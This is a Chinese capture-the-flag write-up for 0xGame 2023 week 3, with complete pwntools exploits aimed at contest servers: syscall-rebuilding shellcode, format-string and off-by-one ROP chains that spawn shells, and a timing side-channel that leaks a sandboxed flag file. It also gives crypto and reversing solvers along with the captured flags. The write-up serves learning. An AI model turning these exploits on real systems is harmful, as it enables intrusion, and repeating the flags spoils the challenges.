[0xGame 2023 公开赛道] week3

news2024/11/16 13:51:36

9点停止提交,抓紧时间写出来,明天还有别的题。

PWN

edit-shellcode-runtime

可以输入shellcode然后执行,但是禁用了\x0f\x05(syscall,箭头处),这里需要用前边的程序把这个syscall弄出来。我这里最后一个字符输入\x0f再在后边异或出个\x05就行了。

from pwn import *

#p = process('./pwns')
p = remote('8.130.35.16', 53003)
context(arch='amd64', log_level='debug')

#gdb.attach(p, "b*0x20230000\nc")

p.sendlineafter(b"Input your code length:\n", b'32')

#在0x21处异或得到5,与前部组成0f05(syscall)实在read(0,+20,rdx利用残留)
pay = '''
mov rsi, 0x20230020
push 0x5
pop rax
xor [rsi],rax
xor rdi,rdi
xor rax,rax
'''
shellcode = asm(pay).ljust(0x1f, b'\x90') + b'\x0f'
p.sendafter(b"Now show me your code:\n", shellcode)
p.sendlineafter(b"Where?\n", b'4db030')
p.sendafter(b"What?\n", p64(0x20230000))

p.send(b'\x05'+ asm(shellcraft.sh()))
p.interactive()

 

fmt3

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+Fh] [rbp-111h]
  char buf[264]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v6; // [rsp+118h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  bufinit();
  puts("Now things become a little interesting.");
  puts("But not that interesting......");
  puts("GO! GO! GO!");
  do
  {
    do
    {
      printf("Input your content: ");
      read(0, buf, 0x100uLL);
      printf(buf);
      puts("Want more?");
      v4 = getchar();
    }
    while ( v4 == 'y' );
  }
  while ( v4 == 89 );
  return 0;
}

跟前两周比,这里开了PIE,不过用处不大,在取得libc和栈地址后,可以在返回地址写上ROP

from pwn import *

#p = process('./fmt3')
p = remote('8.130.35.16', 52002)
context(arch='amd64', log_level='debug')

#gdb.attach(p, "b*0x555555555309\nc")
libc = ELF('./libc.so.6')

p.sendafter(b"Input your content: ", b'%40$p,%43$p,%41$p,')
stack = int(p.recvuntil(',', drop=True), 16) - 0xe8
libc.address = int(p.recvuntil(',', drop=True), 16) - 243 - libc.sym['__libc_start_main']
print(f"{stack = :x} {libc.address = :x}")
p.sendafter(b"Want more?", b'y')

pop_rdi = next(libc.search(asm('pop rdi;ret')))
pop_rsi = next(libc.search(asm('pop rsi;ret')))

pay = flat(pop_rdi, next(libc.search(b'/bin/sh\x00')))
pay = fmtstr_payload(8, {stack: pay})
p.sendafter(b"Input your content: ", pay)
p.sendafter(b"Want more?", b'y')

pay = flat(pop_rsi,0, )
pay = fmtstr_payload(8, {stack+0x10: pay})
p.sendafter(b"Input your content: ", pay)
p.sendafter(b"Want more?", b'y')

pay = flat(pop_rdi+1,libc.sym['system'])
pay = fmtstr_payload(8, {stack+0x20: pay})
p.sendafter(b"Input your content: ", pay)
p.sendafter(b"Want more?", b'n')

p.interactive()

 

FOP_shellcode-any-revenge

这个题没get到真正的解题点,也许是非预期,反正作的相当麻烦。

第1个圈是在运行shellcode时先跳个rand()%256 由于只能写入256字节,所以为了防止命中,需要shellcode尽量短

第2个圈个沙箱也就是不能得到shell

第3个圈是关掉了标准输出。拿不到shell也拿不到输出我猜就只能侧信道攻击,所以这个题作得相当麻烦。

第4点没圈出来,就是文件名不是flag也就是需要爆破文件名

思路:

1是先爆破文件名,这里需要打开目录,然后读(程序与后边相同)目录名问了别有用getdents,这里由于命令过行,只写入一个read并充分利用残留,让shell尽量小,然后再读入后续程序。虽然程序已经尽量小,但也会中断。所以要爆破好久。

2把数据读到指定区域后逐个字符试,如果相同就进入死循环,不同就exit,这样就可以通过是否中断判断是否猜中。

from pwn import *

context(arch='amd64', log_level='error')

def read_v(offset, v):
    p = remote('8.130.35.16', 53001)
    #p = process('./ret2shellcode-revenge')
    #gdb.attach(p, "b*0x555555555540\nc")
    #读目录爆破文件名
    #pay2 = shellcraft.open('.')+shellcraft.getdents('rax',target,0x400)
    #读文件
    pay2 = shellcraft.open('flag-5cd1e4c895')+shellcraft.read('rax',target,0x40)
    pay2 += f'lab: mov rax, 0x{offset:x};mov cl,byte ptr [rax]; cmp cl, {v}; je lab;' + shellcraft.exit(0)
    s2 = b'\x90'*0x100+asm(pay2)
    #pay = shellcraft.read(0,0x20230100,len(s2))
    pay = "xor edi,edi;push rdx;pop rsi;syscall;"  #减小长度,减小被rand命中
    p.sendafter(b"Now show me your code:\n", asm(pay).rjust(256, b'\x90')+s2)
    p.recvline()
    try:
        p.recv(timeout=0.3)
        p.close()
        #p.interactive()
        return True
    except:
        p.close()
        return False

target = 0x20230200 #写目录和文件
#爆破各目录项的长度
#目录项结构: struct linux_dirent {unsigned long d_ino;off_t d_off;unsigned short d_reclen;char d_name[];}; 8 8 2 s 
#dir 0x20+0x18+0x20+0x20+0x18+0x18+0x30+0x20+0x18+0x20+0x28+0x20
dlist = [0x20,0x18,0x20,0x20,0x18,0x18,0x30,0x20,0x18,0x20,0x28,0x20]
#.bashrc . .bx .px .. bin ret2re.. lib lib
while 1:
    for i in range(0, 0x40, 8):
        if read_v(target+0x10+sum(dlist), i):
            print(hex(i),'!')
            dlist.append(i)
            print(' '.join([hex(_)[2:] for _ in dlist]))
            break
        else:
            print(i,'x', )
    if dlist[-1] == 0:
        break

print(dlist)

name = 'flag-5cd1e4c895'
'''
#爆破目录文件名,确定flag文件名
dic = b'.\x000123456789abcdef-ghijklmnopqrstuvwxyz'
for i in range(5):
    for i in dic:
        if read_v(target+sum(dlist[:10]) + 0x10+2 + len(name), i):
            name += chr(i)
            print('name:',name)
            break
        else:
            print(chr(i), end=' ')
'''


dic = b'0123456789_}abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-' 
name = '0xGame{N0_0n3_c4n_sTop_my_C0de_8v2yuwe7}'
for i in range(50):
    for i in dic:
        if read_v(target+len(name), i):
            name += chr(i)
            print('name:',name)
            break
        else:
            print(chr(i), end=' ')

linux-fd

这题一开始想很简单,然后没弄成,最后看来还是很简单,只是有个小坑。

先关闭标准输出,再打开flag,这时候会从最小文件描述符开始用,也就是1,然后写的时候由于输出已经关闭了,可以向0或2输出。

不过这里有个小坑,输入文件名的时候,如果手工输入会有个回车,而filename[xx]=0并不能把这个回车删掉。所以手工一直没整成。改程序就OK了。

from pwn import *

context(arch='amd64', log_level='debug')

p = remote('8.130.35.16', 53000)

#p = process('./fd')
#gdb.attach(p, "b*0x40138b\nc")

p.sendafter(b"Input filename to open: ", b'./flag')  #filename[read(0,filename,0)]=0 并不能删掉未必的回车,手工输入不行
p.sendlineafter(b"Input file id to read from: ", b'1') #close(1)后,打开文件会使用最小fd 1
p.sendlineafter(b"Input file id to write to: ", b'2') #输出重定向到0或2均可
print(p.recv(0x1ff))

p.interactive()

 

poison-stack-base

这个漏洞写得过于直白

int vuln()
{
  char v1[256]; // [rsp+0h] [rbp-100h] BYREF

  puts("Try perform ROP!");
  custom_gets_off_by_one_or_null((__int64)v1, 256);
  return puts("Good luck!");
}

custom_gets_off_by_one_or_null就是个1字节溢出,可以覆盖rbp的尾字节,这样会移栈到前边,虽然位置不定,但只要ROP足够短,成功率不敢说100%也够高的。

from pwn import *

#p = process('./poison-rbp')
p = remote('8.130.35.16', 52004)
context(arch='amd64', log_level='debug')

#gdb.attach(p, "b*0x401290\nc")

elf = ELF('./poison-rbp')
libc = ELF('./libc.so.6')

pop_rdi = 0x0000000000401393 # pop rdi ; ret
pop_rsi = 0x0000000000401391 # pop rsi ; pop r15 ; ret

#利用写满256后 off_by_null的0修改 rbp尾字节为0移栈执行前部的ROP
#vuln 去掉push rbp, 使用原栈再次读ROP执行
pay = p64(pop_rdi+1)*28 + flat(pop_rdi, elf.got['puts'], elf.plt['puts'], 0x401259)
p.sendafter(b"Try perform ROP!\n", pay)
p.recvline()
libc.address = u64(p.recvuntil(b'\x7f').ljust(8, b'\x00')) - libc.sym['puts']
print(f"{libc.address = :x}")

pay = p64(pop_rdi+1)*25 + flat(pop_rdi, next(libc.search(b'/bin/sh')), pop_rsi,0,0, libc.sym['system'])
p.sendafter(b"Try perform ROP!\n", pay)

p.interactive()

REV

java专场

代码启示录

反编译后不解释

package defpackage;

import java.util.Scanner;

/* renamed from: Main  reason: default package */
/* loaded from: 代码启示录.jar:Main.class */
public class Main {
    public static void main(String[] args) {
        Scanner scanner = new Scanner(System.in);
        System.out.print("请输入你的答案:");
        String userInput = scanner.nextLine();
        if (userInput.equals("0xGame{038e8685-0a59-a868-ed44-979261e99faf}")) {
            System.out.println("恭喜你,打开了神秘的门!");
        } else {
            System.out.println("很遗憾,你的答案不正确!");
        }
        scanner.close();
    }
}

数字幽灵

一个base58变表,但是这个storedFlag找不到,一般在R/layout下,但找遍了没有,然后解包后发现一个resources.arsc文件,直接打开(java不加密)看到密文

zip解包后010打开 resources.arsc
找到base58串,变表:ABCDEFGHJKLMNPQRSTUVWXYZ123456789abcdefghijkmnopqrstuvwxyz
RmC442S4tDMzc3CvzoCx8toKodL8SE8GRQSmz8M84k6g9jG1vVrf3c5TECZR
0xGame{5f7dc2d9-5243-f706-cdbf-12e34dd3970c}

虚构核心

打开就发现什么叫虚构核心了,先要打开一个dex文件,然后异或解密后保存,再打开运行进行。

处理文件 后打开,可以看到3个md5串,这个都只有4字节可以爆破也可以从网上查。

from pwn import xor
'''
key = b"The0xGameKey"
c = open('encrypted.dex','rb').read()
open('decrypted.dex','wb').write(xor(c, key))
'''
#44,-,5
#0xGame{f5bf50a3-9988-61ee-8c00-f3eddaccb39f}
md5k = ["69b4fa3be19bdf400df34e41b93636a4", "76b662c5c3d6d98035190115d89ef42f", "87fff610a9c97ebbe5a16a6d4865c0e4"]

'''
public class FlagChecker {
    public static boolean checkFlag(String input) {
        if (input.length() == 44 && input.startsWith("0xGame{") && input.endsWith("}")) {
            String content = input.substring(7, input.length() - 1);
            String[] parts = content.split("-");
            if (parts.length != 5 || !"f5bf50a3".equals(parts[0]) || !"f3eddaccb39f".equals(parts[4])) {
                return false;
            }
            String[] md5Strings = {"69b4fa3be19bdf400df34e41b93636a4", "76b662c5c3d6d98035190115d89ef42f", "87fff610a9c97ebbe5a16a6d4865c0e4"};
            for (int i = 1; i <= 3; i++) {
                if (parts[i].length() == 4 && !md5Strings[i - 1].equals(md5(parts[i]))) {
                    return false;
                }
            }
            return true;
        }
        return false;
    }

    public static String md5(String input) {
        try {
            MessageDigest md = MessageDigest.getInstance("MD5");
            byte[] messageDigest = md.digest(input.getBytes());
            StringBuilder sb = new StringBuilder();
            for (byte b : messageDigest) {
                sb.append(String.format("%02x", Integer.valueOf(b & 255)));
            }
            return sb.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new RuntimeException("MD5加密出现错误");
        }
    }
}
'''

 

变量迷城

这里用了一个变量x 和"0xGame"连一起作为key加密

public class Main {
    private static BiPredicate<BigInteger, BigInteger> equationCheck = x, y -> {
        BigInteger eq1 = x.pow(2).add(y.pow(2).multiply(BigInteger.valueOf(2L))).add(x.multiply(BigInteger.valueOf(3L))).add(y.multiply(BigInteger.valueOf(4L))).subtract(new BigInteger("7384462351178"));
        BigInteger eq2 = x.pow(2).multiply(BigInteger.valueOf(5L)).add(y.pow(2).multiply(BigInteger.valueOf(6L))).add(x.multiply(BigInteger.valueOf(7L))).add(y.multiply(BigInteger.valueOf(8L))).subtract(new BigInteger("22179606057658"));
        return eq1.equals(BigInteger.ZERO) && eq2.equals(BigInteger.ZERO);
    };
    private static Byte[] encryptedFlag = {(byte) 1, (byte) 73, (byte) 115, (byte) 84, (byte) 92, (byte) 81, (byte) 75, (byte) 65, (byte) 116, (byte) 84, (byte) 90, (byte) 93, (byte) 7, (byte) 2, (byte) 87, (byte) 24, (byte) 83, (byte) 87, (byte) 84, (byte) 64, (byte) 106, (byte) 4, (byte) 9, (byte) 86, (byte) 84, (byte) 28, (byte) 4, (byte) 5, (byte) 9, (byte) 82, (byte) 29, (byte) 74, (byte) 119, (byte) 85, (byte) 93, (byte) 1, (byte) 3, (byte) 84, (byte) 0, (byte) 0, (byte) 1, (byte) 0, (byte) 3, (byte) 5};

    public static void main(String[] args) throws IOException {
        String envVar1 = System.getenv("x");
        String envVar2 = System.getenv("y");
        String brand = System.getProperty("brand");
        if (brand == null || envVar1 == null || envVar2 == null) {
            brand = "0";
            envVar2 = "0";
            envVar1 = "0";
        }
        BigInteger x = new BigInteger(envVar1);
        BigInteger y = new BigInteger(envVar2);
        if (equationCheck.test(x, y) && brand.equals("0xGame")) {
            String decryptedFlag = decryptFlag(encryptedFlag, x, brand);
            System.out.println("恭喜你找到了通往真相的路!");
            System.out.println("秘密:" + decryptedFlag);
            return;
        }
        System.out.println("你似乎迷路了~");
    }

    private static String decryptFlag(Byte[] encryptedFlag2, BigInteger javaClassVersion, String systemVar) {
        String key = javaClassVersion + systemVar;
        StringBuilder flag = new StringBuilder();
        for (int i = 0; i < encryptedFlag2.length; i++) {
            flag.append((char) (encryptedFlag2[i].byteValue() ^ key.charAt(i % key.length())));
        }
        return flag.toString();
    }
}

这个x 回到z3了,解出来放上就行了

encryptedFlag = [1, 73, 115, 84, 92, 81, 75, 65, 116, 84, 90, 93, 7, 2, 87, 24, 83, 87, 84, 64, 106, 4, 9, 86, 84, 28, 4, 5, 9, 82, 29, 74, 119, 85, 93, 1, 3, 84, 0, 0, 1, 0, 3, 5]

from z3 import * 
s = Solver()
x,y = Ints("x y")

s.add(x*x + 2*y*y + 3*x + y*4 == 7384462351178)
s.add(x*x*5 + y*y*6 +x*7 + y*8 == 22179606057658)

s.check()
s.model()

x = 114514
y = 1919810

key = '1145140xGame'
xor(bytes(encryptedFlag), key.encode())
b'0xGame{9357863c-bcd8-ed3e-008f-2040d2e45043}'

CRYPTO

EzECC

这题给了一个自制的椭圆曲线,一个很小的r可以爆破。然后是C = M + r*K求M

from Crypto.Util.number import *
from secret import msg
import random

flag = b'0xGame{' + msg + b'}'

q = getPrime(80)
a,b= [random.randrange(1,q-1) for i in range(2)]

def add(P,Q):
	if P[0] != Q[0] and P[1] != Q[1]:
		t = ((Q[1]-P[1]) * inverse(Q[0]-P[0],q)) %q
	else:
		t = ((3*P[0]*P[0]+a) * inverse(2*P[1],q))%q      #y^2 = x^3 + a*x + b
	x3 = t*t - P[0] - Q[0]
	y3 = t*(P[0] - x3) - P[1]
	return (x3%q, y3%q)

def mul(t, A, B=0):
    if not t: return B
    return mul(t//2, add(A,A), B if not t&1 else add(B,A) if B else A)

assert len(msg)%2==0
m1=bytes_to_long(msg[:len(msg)//2])
m2=bytes_to_long(msg[len(msg)//2:])

k = random.getrandbits(64)
G = (641322496020493855620384 , 437819621961768591577606)
K = mul(k,G)

M = (m1,m2)
r = random.getrandbits(16)

C_1 = add(M,mul(r,K))
C_2 = mul(r,G)

print(f'q={q}\na={a}\nb={b}\n')
print(f'G = {G}\nK = {K}\nC_1={C_1}\nC_2={C_2}')

试了好久才发现这人M不能用add里的公式从用C和rK推出来,因为这是阿贝尔群(hint)。于是查了下阿贝尔群上的减法。

q=1139075593950729137191297
a=930515656721155210883162
b=631258792856205568553568

G = (641322496020493855620384, 437819621961768591577606)
K = (781988559490437792081406, 76709224526706154630278)
C_1=(55568609433135042994738, 626496338010773913984218)
C_2=(508425841918584868754821, 816040882076938893064041)

#爆破出r
for r in range(1<<16):
    if mul(r,G) == C_2:
        print(r)
        break 

r = 10077


rK = mul(r,K)
rK = (550786064209051189742959, 152240627779498678778874)

#M = C1 + -rK 
FrK = (550786064209051189742959, -152240627779498678778874%q)
M = add(C_1,FrK)
m1,m2 = M
from Crypto.Util.number import long_to_bytes as l2b 
l2b(int(m1))+l2b(int(m2))  #???????
#Al1ce_L0ve_B0b

 

LLL-FirstBlood

先出的2血那道,1血很久才出

from random import randrange
from Crypto.Util.number import getPrime,bytes_to_long
from secret import flag
assert len(flag) % 4 == 0

length = len(flag)//4
m = [bytes_to_long(flag[i*length:(i+1)*length]) for i in range(4)]
p = getPrime(int(128))

def MakeMask(n,p):
    upper = identity_matrix(n)
    low = identity_matrix(n)
    for i in range(n-1):
        for j in range(i+1, n):    
            upper[i, j] = randrange(1, p)
            low[j, i] = randrange(1, p)
    result = upper * low
    assert det(result) == 1
    return result

def Matrix2List(x):return [list(i) for i in x]

noise = [[randrange(1, p) for i in range(4)] for _ in range(4)]
noise[0] = m
M = matrix(noise)
A = MakeMask(4,p)
C = A*M

print(f'p={p}')
print(f'C={Matrix2List(C)}')
'''
p=198880159035681668071031460916089145469
C=[[1528140902799730745476264672501768332416990282355490479242339131918301176698899635154781328839496210200676497333428, 2081687444435007467807250373278513114045272585243815458840083487459795021302180077490134099644993120009567147202772, 3080873409460299046339495750746632185307246572817534784703936044874106809413620470006445984962733721029566440253675, 3491734341995174183626991907292607070252197520631412767989879432598743851171175369180080355977574296558734415823458], [2359409535809048127331244699867147546817134802610067329431135227991488324148374065940238308147500809599395748756798, 3191196199160821446351036460385791985682645040446022512790815348810555748825420237291839170774872264097466183208742, 4665346530155386457242345394284286198347336281451530670818113876767736288089400119492317775648206643242839430899283, 5369350746042850276067380638571565496087948799720968959426256192923852197959381101839484196445995828389461004495917], [1641407111066265429602929560264443103285908072677065498760570514577412905392260182334706635555256537745902283191251, 2190536173399177167068153351271988931232272884028569669242062395087922275021628334797729266560930040116807133977244, 3127556759140845426132305699421707182108351516931881411928719802847628408656887897596425133523782526561471050447359, 3707239956529200159380870618471703921011276020439315706352183576289925263316580408968092016782483770373121972835410], [9883814543195849013523934427451407019514807606993414569626142656857168165339, 13190422499129347541373922929251088892868361241120937213742340947017395215646, 18832738552342488056498211782604832513006649329982003661701684946590064734701, 22323329751908690611034666068697427811613727429398087082295754189068333861152]]
'''

A是一个由上三角随机和下三解随机乘的矩阵,对角线为1,只给了个C,这人C其实和M在同一个格上,所以就有直接取格就OK

C = matrix(C)
L = C.LLL()
b''.join([l2b(-i) for i in row])
#b'0xGame{8e4d5924dc4cd78f11c1eeb99e991ab3}'

LLL-SecondBlood

这是个HNP问题

from secret import flag

m = bytes_to_long(flag)
q = getPrime(512)
assert m.bit_length() == 318

def encrypt(m):
	mask,noise = getPrime(511),getPrime(50)
	mask_.append(mask)
	noise_.append(noise)
	c = (mask*m + noise)%q
	return c

noise_,mask_  =[[] for _ in range(2)]
c_ = [encrypt(m) for i in range(4)]

print(f'q = {q}\nmask = {mask_}\nc_ = {c_}')

用格的那个程序

p = 9342426601783650861020119568565656404715236059903009041977149778244153930435908024696666887269890479558473622355346816236972767736577737332173213722012253
T = [6237128445236992920577225644858662677575951126467888858782461334057970069468925833844231116647406833999142659751374620280213290736114576089069396331226747, 6368031389213953889417545256750169233725975229197446803885029159767701479445576860704561593200907482372690851152126782391126462547524526631934408981070841, 5106473460982791188578285397420642137630347289252852045044021197988607082777231839839730169682158507822078412449827976663385282021916120837408192506341443, 6318090842950331228033349517542810123596316850353637421587264886413877142612686177796023049304908696413386218992511112752788640732410845589679820003047667]
A = [3823539664720029027586933152478492780438595004453489251844133830947165342839393878831914879334660250621422877333022321117120398528430519794109624186204492, 1721659645750224819953244995460589691120672649732560768435214608167861246790136217219349234604724148039910656573436663379375048145045443527267790379816425, 668633520079344839648950502380059311916108468801009386138810324259146523323704014491547148973835774917331333581475920804677395949854411894556705238578896, 497860586379981076499130281851986010889356253371192266267220334713415782402939318483926418213877341511996918189750595755372560345085899109305344338944066]
B = 2^50
sol = hnp(p, T, A, B, verbose=True)
#0xGame{19255b5c7b19c790e28d87c8a8bb1d33}

EzMatrix

矩阵DLP问题

from Crypto.Util.number import getPrime
from random import randint
from secert import secert,flag
from hashlib import md5
def n2b(n):return md5(str(n).encode()).hexdigest()

assert secert < pow(2,64)
assert flag == '0xGame{'+n2b(secert)+'}'

def Martix2list(Martix):
    result = []
    Martix = list(Martix)
    for i in Martix:
        result.append(list(i))
    return result

enc = A**secert

def Martix2list(Martix):
    result = []
    Martix = list(Martix)
    for i in Martix:
        result.append(list(i))
    return result

with open('enc.txt','w') as f:
    f.write(str(Martix2list(enc)))

这个真不会了,拿了师傅的WP终于明白方法跟数字和椭圆曲线还是有点区别的,因为不能直接用discrete_log要自己写个大步小步法求

#C = A^secret 
n = 12
G=[[12143520799533590286, 1517884368, 12143520745929978443, 796545089340, 12143514553710344843, 28963398496032, 12143436449354407235, 158437186324560, 12143329129091084963, 144214939188320, 12143459416553205779, 11289521392968],[12143520799533124067, 1552775781, 12143520745442171123, 796372987410, 12143514596803995443, 28617862048776, 12143437786643111987, 155426784993480, 12143333265382547123, 140792203111560, 12143460985399172467, 10983300063372],[12143520799533026603, 1545759072, 12143520746151921286, 781222462020, 12143514741528175043, 27856210942560, 12143440210529480891, 150563969013744, 12143339455702534403, 135941365971840, 12143463119774571623, 10579745342712],[4857408319806885466, 2428704161425648657, 12143520747462241175, 758851601758, 12143514933292307603, 7286139389566980165, 9714738936567334300, 144947557513044, 12143346444338047691, 130561054163540, 4857352974113333366, 2428714303424782417],[12143520799533339320, 1476842796, 12143520749060275613, 733281428880, 12143515144091549812, 25896324662208, 12143446129977471347, 139126289668080, 12143353609086952433, 125093278125816, 12143467808884068695, 9705993135696],[3469577371288079926, 5204366058378782250, 12143520750775862343, 706665985740, 12143515359139397843, 24876891455539, 12143449149385190675, 5204499435641729607, 1734628523990131469, 119757210113970, 12143470097256549947, 9282407958928],[10986995009101166671, 1734788687033207505, 12143520752514668698, 680173911560, 12143515570582515443, 23883386182656, 12143452072344092516, 10408859957710764174, 8673790006740000925, 4047954924507284041, 12143472277719610437, 8879790035168],[12143520799534210329, 8095680534365818753, 12143520754224346525, 6071761054204856029, 12143515774342357443, 22931775530664, 12143454859049102627, 122586336122081, 12143373761302849103, 109840689548590, 8095634066844843878, 8500892291801],[2428704159899526175, 7286112481016467893, 12143520755876491019, 629765964828, 12143515968446948123, 9714838668887734012, 4857345013259425502, 117630592711632, 12143379764863568374, 105318302849760, 2428659620509049335, 7286120625945355053],[7286112479717322389, 7286112480971640825, 12143520757456628435, 606320684970, 12143516152115449139, 4857429497934652454, 4857347490735050126, 112978994964264, 12143385390297217523, 101086824360217, 7286069740980100293, 7286120294834973633],[7727695054246476847, 1202487728, 12143520758958480293, 584144077140, 12143516325240923843, 20377952745696, 12143462294760579275, 108622249048560, 12143390651947217363, 97133513961120, 12143479741445599772, 8831658996900830432],[12143520799535388887, 1161628182, 12143520760380594623, 563225247585, 12143516488091679443, 19626876325056, 12143464472820678035, 104545135017180, 12143395570399006523, 93441517429260, 12143481309754543787, 7218375794633]]# 12*12
p = 12143520799543738643
A = Matrix(GF(p),A)
enc = [[11285847990515095003, 7585413350741918021, 11658254512436412666, 477577914899276103, 2941386515764607825, 11283325421744133699, 4096971712575507616, 8118672870538606033, 2377937081025778041, 6576171711896495163, 6152554374963853172, 5022013484610428974], [8354008012616001452, 7787447107046065118, 9504997911333967278, 1082773427768571094, 6015520658629219637, 11244285744740006951, 4493944053220750368, 3504246247470690014, 1738582001618280397, 2330057776906622572, 3043456814665571080, 2981613454022714952], [2508674373714509177, 3544963739532775937, 7952732753025175616, 11161786730565526285, 3397123486689639675, 6454135592624912854, 6613201018024296927, 9748485344986779929, 1819761609989340766, 1259944825407465767, 1596049024644778041, 7769939905324967788], [4200851163596876950, 11960539098651202761, 3303721151143544462, 2532304102428121556, 11083895221097319129, 1171933471304558017, 1549099593543874478, 6088238862927163233, 6459553630361959801, 947358195425767572, 2090533922210134578, 9023030120605201052], [2271102089902208138, 1614812525306266829, 1546249462332047661, 3168333397191737100, 7678980468150522028, 3128939172985153696, 1146041044751755224, 11870173227065140617, 8351303466095252790, 694704483676649448, 7944218023016968278, 583421745603756386], [10309472503110333289, 1100598261990718822, 10235859400888405310, 910925705831020921, 10771855884237562064, 9970830255165655653, 11678899608458971536, 4368822164222204233, 3104861419162339779, 4540709628196554222, 7851809145727500968, 12086896840826708824], [10973051751637593366, 5039073157846327641, 4855314857834773443, 4416954195828423951, 8243966437000815560, 8250554263390748131, 8093181066366682440, 1145520354143718292, 294729013023637045, 10115389386419597159, 2767140395261835843, 6724257139233017485], [6878768250003631244, 10834164422364241529, 6946589221005878489, 539734218479521833, 2691724062063066048, 3989403041446358401, 815244541494093987, 11168528286389981272, 2021358468726921955, 1123433019094267521, 524639025046508882, 5720273332497702547], [6688451244183880831, 10892730373179989558, 6987453292894341174, 5572212176769878684, 11332149024403380575, 3944612864568504791, 6768594304071589280, 10526434024562201079, 10241323610053039912, 1120473558410865753, 306153635148226248, 3606666063074222104], [7556871914690327290, 11353594909211427742, 747771112781361153, 1245068803956910299, 2831489557155431404, 1800035620948876551, 1050411779595241927, 5665981688041778089, 2028968510484240787, 4386552235402890530, 10334391443650474796, 3883841302951550608], [4485787817401669404, 184501191500952934, 3690661645276970957, 6263309802498749034, 6484490370652685031, 9743108369653588026, 3045941510087387269, 5870433915209047275, 4679598273992216016, 11839352681285251516, 4957980185504231911, 7925596893607015470], [1000449712878466719, 7022601702937838844, 1095849907482791166, 11989051568709522226, 6768031250066783733, 185945517026191241, 4280928696740160411, 5633542561098902406, 10176177574499086410, 5782837249861240943, 7406530879613861823, 1971858224839520916]]
enc = matrix(GF(p), enc)

#
def bsgs(P, Q, sub):
    dic = dict()
    m = sqrt(sub).round()

    nowP = P**0
    for i in range(m + 1):
        dic[str(nowP)] = i
        nowP *= P
    mQ = P**(-m)
    nowQ = Q
    for i in range(m + 1):
        if str(nowQ) in dic:
            ans = i*m + dic[str(nowQ)]
            print(ans, P**ans == Q)
            return ans
        nowQ *= mQ

order = A.multiplicative_order()
#order = 12143520799543738642
#factor(order)
fac = [2, 23, 229, 593, 1944001580291]
cs = []
for f in fac:
    print(f)
    cs.append(bsgs(A^(order//f), enc^(order//f), f))
    
secret = crt(cs, fac)
print(secret)
'''
2
1 True
23
18 True
229
57 True
593
419 True
1944001580291
1720136691537 True
[1, 18, 57, 419, 1720136691537]
'''
def n2b(n):return md5(str(n).encode()).hexdigest()

print('0xGame{'+n2b(secret)+'}')
#'0xGame{06450201eb6171d40151563d967e59ea}'

EzOverflow

这题不说了,虽然检查不能和0xGame相同但是用的bytes_to_long所以可以前边输入\x00绕过。

MISC

 不怎么作MISC,两个编程小题记录一下

高数大师

要求写式子和导数双向。只涉及sin,con 和幂

'''
┌──(kali㉿kali)-[~/ctf/1016]
└─$ nc 124.220.8.243 11451
I will give you some equations, try to find their derivatives or integrals!
(d) for derivative, (i) for integral
Answering one question correctly can earn 1 point, and 300 points can earn a flag!
One wrong answer will end the game directly
Example:
5*x**4 + 5*sin(x) - 4*cos(x) - x**2 (d)  -->   20*x**3 - 2*x + 4*sin(x) + 5*cos(x)
2*cos(x) - 3*x - x**2 - x**4 - 3*sin(x) (i)  -->  -x**5/5 - x**3/3 - 3*x**2/2 + 2*sin(x) + 3*cos(x)


press enter to start
>  5*x**2 - 3*x**4 (d)

your answer > 10*x - 12*x**3
correct!
>  x (i)

your answer > 1/2*x**2
correct!
>  2*x - 4*sin(x) - 3*x**3 + 2*x**4 (d)

your answer > 
'''
def get_dx(fh, v):  #乘法的求导
    if 'x' == v[0]: #前边有乘数
        a = 1
    else:
        a = int(v.split('*x')[0])
    if '**' in v:
        b = int(v.split('**')[1])
    else:
        b = 1
    k = a*b
    e = b-1
    if e == 1:
        exp = ''
    else:
        exp = '**'+str(e)
    if k == 1:
        ret = fh + ' ' + 'x' + exp
    else:
        ret = fh + ' ' + str(k)+'*x' + exp
    return ret 

def get_ix(fh, v):  #乘法的求导 逆
    if 'x' == v[0]: #前边有乘数
        a = 1
    else:
        a = int(v.split('*x')[0])
    if '**' in v:
        b = int(v.split('**')[1])
    else:
        b = 1
    k = a
    e = b+1
    if e == 1:
        exp = ''
    else:
        exp = '**'+str(e)
    if k == 1:
        ret = fh + ' ' + 'x' + exp + '/' + str(e)
    else:
        ret = fh + ' ' + str(k)+'*x' + exp + '/' + str(e)
    return ret 


def get_ds(fh, v):
    ffh = {'+':'-','-':'+'}
    if 'sin(x)' in v:
        ret = fh +' '+ v.replace('sin(x)','cos(x)')
    else:
        ret = ffh[fh] +' '+ v.replace('cos(x)','sin(x)')
    return ret 

def get_is(fh, v):
    ffh = {'+':'-','-':'+'}
    if 'cos(x)' in v:
        ret = fh +' '+ v.replace('cos(x)','sin(x)')
    else:
        ret = ffh[fh] +' '+ v.replace('sin(x)','cos(x)')
    return ret 

def get_d(v):
    #符号
    aaa = []
    tmp = ''
    ret = ''
    for i in v:
        if i == '+' or i == '-':
            tmp = i
            continue
        
        if tmp == '': tmp = '+'
        if 'sin(' in i or 'cos(' in i:
            val = get_ds(tmp,i)
        else:
            val = get_dx(tmp,i)
        tmp = ''
        ret += ' '+val
    if ret[:3] == ' + ': ret = ret[3:]
    return ret

def get_i(v):
    #符号
    aaa = []
    tmp = ''
    ret = ''
    for i in v:
        if i == '+' or i == '-':
            tmp = i
            continue
        
        if tmp == '': tmp = '+'
        if 'sin(' in i or 'cos(' in i:
            val = get_is(tmp,i)
        else:
            val = get_ix(tmp,i)
        tmp = ''
        ret += ' '+val
    if ret[:3] == ' + ': ret = ret[3:]
    return ret
    

def getmsg(msg):
    v = msg.decode().split(' ')
    if v[-1] == '(d)':
        r = get_d(v[:-1])
    else:
        r = get_i(v[:-1])
    return r 

'''
t = b'5*x**4 + 5*sin(x) - 4*cos(x) - x**2 (d)'
t = b'2*cos(x) - 3*x - x**2 - x**4 - 3*sin(x) (i)'
print(getmsg(t))
'''
from pwn import *
context.log_level = 'debug'

p = remote('124.220.8.243', 11451)
p.sendlineafter(b'press enter to start', b'')

for _ in range(300):
    p.recvuntil(b'> ')
    msg = p.recvline().strip()
    v = getmsg(msg)
    p.sendlineafter(b'>', v)

p.recvline()
p.interactive()

Miversc

OOK是码,但是运行后没有flag,只能写程序解释,一步步dbg

